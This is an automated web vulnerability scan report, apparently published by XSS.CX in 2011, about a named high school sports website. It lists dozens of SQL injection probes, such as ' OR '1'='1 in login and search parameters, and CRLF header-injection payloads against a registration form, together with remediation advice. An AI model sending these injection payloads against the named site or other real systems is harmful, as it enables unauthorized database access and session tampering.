XSS, Cross Site Scripting in highschoolsports.net, CWE-79, CAPEC-86, DORK, GHDB, HTTP Header Injection, Stored XSS, Blind SQL Injection

Report generated by XSS.CX Home at 2011.08.20, Sat, at 04:02:32 GMT-06:00.

GHDB DORK Report for highschoolsports.net

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
Host/IP High Medium Low Info
www.highschoolsports.net ( port 80 ) 2101

Alert Detail Click here to hide all alerts
Hide the alert
High (Suspicious)MySQL Blind SQL Injection
Description
Blind SQL Injection is possible in MySQL database.
URL http://www.highschoolsports.net/MyAccount
Parameter POST parameter: sign_in_type_2=/*!00000 0*/
Other information The same web page is returned if MySQL comment is added to parameter(s).
URL http://www.highschoolsports.net/TermsofService/
Parameter POST parameter: username=/*!00000 1*/
Other information The same web page is returned if MySQL comment is added to parameter(s).
URL http://www.highschoolsports.net/massey/state/Idaho/Football/Varsity/Boys/2011/
Parameter POST parameter: username=/*!00000 1*/
Other information The same web page is returned if MySQL comment is added to parameter(s).
Solution
Do not trust client side input even if there is client side validation. In general,
- If the input string is numeric, type-check it.
- If the application used JDBC, use PreparedStatement or CallableStatement with parameters passed by '?'
- If the application used ASP, use ADO Command Objects with strong type checking and parameterized query.
- If stored procedure or bind variables can be used, use it for parameter passing into query. Do not just concatenate string into query in the stored procedure!
- Do not create dynamic SQL query by simple string concatentation.
- Use minimum database user privilege for the application. This does not eliminate SQL injection but minimize its damage. e.g., if the application require reading one table only, grant such access to the application. Avoid using 'sa' or 'db-owner'.
Reference
- The OWASP guide at http://www.owasp.org/documentation/guide
- http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23
- http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
- For Oracle database, refer to http://www.integrigy.com/info/IntegrigyIntrotoSQLInjectionAttacks.pdf

Hide the alert
High (Suspicious)SQL Injection
Description
SQL injection maybe possible. User parameters submitted will be formulated into a SQL query for database processing. If the query is built by simple 'string concatenation', it is possible to modify the meaning of the query by carefully crafting the parameters. Depending on the access right and type of database used, tampered query can be used to retrieve sensitive information from the database or execute arbitrary code. MS SQL and PostGreSQL, which supports multiple statements, may be exploited if the database access right is more powerful. This can occur in URL query strings, POST paramters or even cookies. Currently check on cookie is not supported by us. You should check SQL injection manually as well as some blind SQL injection areas cannot be discovered by this check.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1%20AND%201=1&gender=Boys&lvl=6th&spt=Alpine%2525252520Skiing
Parameter sc_id=-1 AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys%20AND%201=1&lvl=6th&spt=Alpine%2525252520Skiing
Parameter gender=Boys AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys&lvl=6th%20AND%201=1&spt=Alpine%2525252520Skiing
Parameter lvl=6th AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1%22%20AND%20%221%22=%221&genderlevelsport=-1
Parameter sc_id=-1" AND "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&genderlevelsport=-1%20AND%201=1
Parameter genderlevelsport=-1 AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?searchStr=Enter%20School%20Name%25252C%20City%20or%20Zip'%20AND%20'1'='1
Parameter searchStr=Enter School Name%252C City or Zip' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/TermsofService/?sc_id=-1%22%20AND%20%221%22=%221&gender=Boys&lvl=6th&spt=Alpine%25252520Skiing
Parameter sc_id=-1" OR "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/TermsofService/?sc_id=-1&gender=Boys&lvl=6th%22%20AND%20%221%22=%221&spt=Alpine%25252520Skiing
Parameter lvl=6th" OR "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/Massey/state/Florida/Football/Varsity/Boys/2011/
Parameter POST parameter: searchStr=Search+for+a+School' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/Massey/state/Idaho/Football/Varsity/Boys/2011/
Parameter POST parameter: searchStr=Search+for+a+School' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/Massey/state/Wisconsin/Football/Varsity/Boys/2011/
Parameter POST parameter: searchStr=Search+for+a+School' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys%20AND%201=1&lvl=6th&spt=Alpine%25252520Skiing
Parameter POST parameter: gender=Boys OR 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys&lvl=6th'%20AND%20'1'='1&spt=Alpine%25252520Skiing
Parameter POST parameter: lvl=6th' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys&lvl=6th&spt=Alpine%25252520Skiing%22%20AND%20%221%22=%221
Parameter POST parameter: spt=Alpine%252520Skiing" OR "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys&lvl=6th&spt=Alpine%25252520Skiing
Parameter POST parameter: username=1' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys&lvl=6th&spt=Alpine%25252520Skiing
Parameter POST parameter: password=' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys&lvl=6th&spt=Alpine%25252520Skiing
Parameter POST parameter: sign_in_type=hss" OR "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys&lvl=6th&spt=Alpine%25252520Skiing
Parameter POST parameter: sign_in_type=stats AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount
Parameter POST parameter: sign_in_type=hss AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount
Parameter POST parameter: sign_in_type_2=0" AND "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/TermsofService/
Parameter POST parameter: password=" OR "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/TermsofService/
Parameter POST parameter: sign_in_type=hss OR 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/TermsofService/
Parameter POST parameter: sign_in_type=stats AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Florida/Football/Varsity/Boys/2011/?sc_id=-1&gender=Boys&lvl=6th'%20AND%20'1'='1&spt=Alpine%25252520Skiing
Parameter lvl=6th' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Florida/Football/Varsity/Boys/2011/?sc_id=-1&genderlevelsport=-1%20AND%201=1
Parameter genderlevelsport=-1 AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Florida/Football/Varsity/Boys/2011/?searchStr=Enter%20School%20Name%25252C%20City%20or%20Zip%20AND%201=1
Parameter searchStr=Enter School Name%252C City or Zip AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Florida/Football/Varsity/Boys/2011/
Parameter POST parameter: username=1 AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Florida/Football/Varsity/Boys/2011/
Parameter POST parameter: sign_in_type=hss' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Florida/Football/Varsity/Boys/2011/
Parameter POST parameter: sign_in_type=stats' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Idaho/Football/Varsity/Boys/2011/?forgotPassword=Enter%20your%20email%20address%22%20AND%20%221%22=%221
Parameter forgotPassword=Enter your email address" AND "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Idaho/Football/Varsity/Boys/2011/?sc_id=-1&gender=Boys%20AND%201=1&lvl=6th&spt=Alpine%25252520Skiing
Parameter gender=Boys AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Idaho/Football/Varsity/Boys/2011/?sc_id=-1&gender=Boys&lvl=6th'%20AND%20'1'='1&spt=Alpine%25252520Skiing
Parameter lvl=6th' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Idaho/Football/Varsity/Boys/2011/?sc_id=-1&genderlevelsport=-1'%20AND%20'1'='1
Parameter genderlevelsport=-1' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Idaho/Football/Varsity/Boys/2011/
Parameter POST parameter: username=1' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Idaho/Football/Varsity/Boys/2011/
Parameter POST parameter: sign_in_type=hss OR 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Idaho/Football/Varsity/Boys/2011/
Parameter POST parameter: sign_in_type=stats OR 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Missouri/Football/Varsity/Boys/2011/?searchStr=Enter%20School%20Name%25252C%20City%20or%20Zip%20AND%201=1
Parameter searchStr=Enter School Name%252C City or Zip OR 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Missouri/Football/Varsity/Boys/2011/
Parameter POST parameter: username=1 AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Missouri/Football/Varsity/Boys/2011/
Parameter POST parameter: password=' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Missouri/Football/Varsity/Boys/2011/
Parameter POST parameter: sign_in_type=hss OR 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/South%25252520Dakota/Football/Varsity/Boys/2011/?sc_id=-1&gender=Boys%22%20AND%20%221%22=%221&lvl=6th&spt=Alpine%25252520Skiing
Parameter gender=Boys" OR "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/South%25252520Dakota/Football/Varsity/Boys/2011/?sc_id=-1&gender=Boys&lvl=6th&spt=Alpine%25252520Skiing'%20AND%20'1'='1
Parameter spt=Alpine%252520Skiing' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/South%25252520Dakota/Football/Varsity/Boys/2011/?sc_id=-1'%20AND%20'1'='1&genderlevelsport=-1
Parameter sc_id=-1' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/South%25252520Dakota/Football/Varsity/Boys/2011/?searchStr=Enter%20School%20Name%25252C%20City%20or%20Zip%20AND%201=1
Parameter searchStr=Enter School Name%252C City or Zip AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/South%25252520Dakota/Football/Varsity/Boys/2011/
Parameter POST parameter: username=1 AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/South%25252520Dakota/Football/Varsity/Boys/2011/
Parameter POST parameter: password=' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/South%25252520Dakota/Football/Varsity/Boys/2011/
Parameter POST parameter: sign_in_type=hss' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/South%25252520Dakota/Football/Varsity/Boys/2011/
Parameter POST parameter: sign_in_type=stats AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Wisconsin/Football/Varsity/Boys/2011/?forgotPassword=Enter%20your%20email%20address%20AND%201=1
Parameter forgotPassword=Enter your email address OR 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Wisconsin/Football/Varsity/Boys/2011/?sc_id=-1&gender=Boys%20AND%201=1&lvl=6th&spt=Alpine%25252520Skiing
Parameter gender=Boys AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Wisconsin/Football/Varsity/Boys/2011/?sc_id=-1&gender=Boys&lvl=6th%20AND%201=1&spt=Alpine%25252520Skiing
Parameter lvl=6th AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Wisconsin/Football/Varsity/Boys/2011/?sc_id=-1&genderlevelsport=-1'%20AND%20'1'='1
Parameter genderlevelsport=-1' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Wisconsin/Football/Varsity/Boys/2011/?searchStr=Enter%20School%20Name%25252C%20City%20or%20Zip%22%20AND%20%221%22=%221
Parameter searchStr=Enter School Name%252C City or Zip" OR "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Wisconsin/Football/Varsity/Boys/2011/
Parameter POST parameter: sign_in_type=stats' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/modules/globalModules/navBar.js.cfm?script_name=/TermsofService.cfm%20AND%201=1
Parameter script_name=/TermsofService.cfm OR 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
Solution
Do not trust client side input even if there is client side validation. In general,
- If the input string is numeric, type-check it.
- If the application used JDBC, use PreparedStatement or CallableStatement with parameters passed by '?'
- If the application used ASP, use ADO Command Objects with strong type checking and parameterized query.
- If stored procedure or bind variables can be used, use it for parameter passing into query. Do not just concatenate string into query in the stored procedure!
- Do not create dynamic SQL query by simple string concatentation.
- Use minimum database user privilege for the application. This does not eliminate SQL injection but minimize its damage. e.g., if the application require reading one table only, grant such access to the application. Avoid using 'sa' or 'db-owner'.
Reference
- The OWASP guide at http://www.owasp.org/documentation/guide
- http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23
- http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
- For Oracle database, refer to http://www.integrigy.com/info/IntegrigyIntrotoSQLInjectionAttacks.pdf

Hide the alert
Medium (Warning)CRLF injection
Description
Cookie can be set via CRLF injection. It may also be possible to set arbitrary HTTP response header.
In addition, by carefully crafting the injected response using cross-site script, cache poisoning vulnerability may also exist.
URL http://www.highschoolsports.net/MyAccount/process/addUser.cfm
Parameter POST parameter: type=P&type=A&type=F&type=C&type=S&type=M&coach_type=n&coach_type=s&coach_type=both&email=1&password=&confirmpassword=&zip=1&school_name=1&school_id=-1&to_uploads=0&genderchoice=&DOBmonth=any%3F%0D%0ASet-cookie%3A+Tamper%3D8961766276418917161&DOBday=&DOByear=&pref_market=
URL http://www.highschoolsports.net/MyAccount/process/addUser.cfm
Parameter POST parameter: type=P&type=A&type=F&type=C&type=S&type=M&coach_type=n&coach_type=s&coach_type=both&email=1&password=&confirmpassword=&zip=1&school_name=1&school_id=-1&to_uploads=0&genderchoice=&DOBmonth=&DOBday=any%0D%0ASet-cookie%3A+Tamper%3D8961766276418917161&DOByear=&pref_market=
URL http://www.highschoolsports.net/MyAccount/process/addUser.cfm
Parameter POST parameter: type=P&type=A&type=F&type=C&type=S&type=M&coach_type=n&coach_type=s&coach_type=both&email=1&password=&confirmpassword=&zip=1&school_name=1&school_id=-1&to_uploads=0&genderchoice=&DOBmonth=&DOBday=&DOByear=any%3F%0D%0ASet-cookie%3A+Tamper%3D8961766276418917161&pref_market=
Solution
Type check the submitted parameter carefully. Do not allow CRLF to be injected by filtering CRLF.
Reference
- http://www.watchfire.com/resources/HTTPResponseSplitting.pdf
- http://webappfirewall.com/lib/crlf-injection.txt
- http://www.securityfocus.com/bid/9804

Hide the alert
Informational (Suspicious)Potential File Path Manipulation
Description
Possiblily there is a file path in the parameter. You should try manual manipulation to check if there can be information exposure such as system files or program source code. In that case the risk would be high.
URL http://www.highschoolsports.net/modules/globalModules/navBar.js.cfm?script_name=/TermsofService.cfm
Parameter script_name=/TermsofService.cfm
Other information The file path that triggers the alert is: /TermsofService.cfm
Solution
Make sure the file path parameter cannot be manipulated to read arbitrary files. Restrict access to intended files only.
Reference
Nil